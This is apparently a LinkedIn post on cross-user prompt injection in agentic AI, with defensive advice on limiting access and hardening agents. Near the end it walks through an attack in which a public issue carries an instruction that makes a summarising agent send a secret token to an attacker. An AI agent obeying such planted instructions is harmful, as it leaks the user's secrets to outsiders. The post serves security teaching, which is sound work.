Learn about the lethal trifecta in agentic AI: the three things that make up the nightmare of data extraction using cross-user prompt injection: https://lnkd.in/eRXewxYS
The biggest threat in Agentic AI? Cross-user prompt injection. Here’s the perfect storm: 1️⃣ It takes only one malicious instruction in any of the input data to perform a prompt injection that manipulates your agent running in the security context of a privileged user (say an admin). 2️⃣ There is hardly a watertight way to detect prompt injections. 3️⃣ You may have incident response and see something suspicious, but if the attack extracts sensitive data, you are already too late. 4️⃣ It is in developers' interest to allow agents to do many things (such as running commands) - increasing the attack surface. 5️⃣ It is in developers' interest to provide agents with access to many systems and data - increasing the blast radius. 6️⃣ Agents are there to communicate with the world, so there's typically a way to send extracted information to the outside. What to do based on the above? 💉 Limit agents' access to untrusted data dynamically - depending on the task at hand 🔍 At least do your best on in-line prompt injection detection (both input and output). There's a duty of care. 🤝 Let dev and ops work together on prompt injection alerts and runbooks. 🛑 Instruct developers and admins to harden agents in system access and in actions allowed. Zero model trust makes blast radius control critical! 🏰 Maximise defence in depth by regarding all your agents as potential malicious actors. The attached picture is a slide from a Software Improvement Group training I regularly provide, based on the OWASP AI Exchange. 1. attacker creates a public issue in a programming platform, with an instruction 2. a developer asks agentic AI to summarize new issues 3. the issue gets processed by an agent that also executes the instruction 4. that malicious instruction retrieves a secret token and sends it to the attacker Easy. This could have been prevented by hardening the agent for the task of summarizing issues. You don't need to send emails for that. The key is to incentivize admins and developers to actually perform this hardening, as it does not make their lives easier. For more information, use the OWASP AI Exchange and learn for example about Simon Willison's lethal trifecta as a threat model. Good luck! #ai #agenticai #security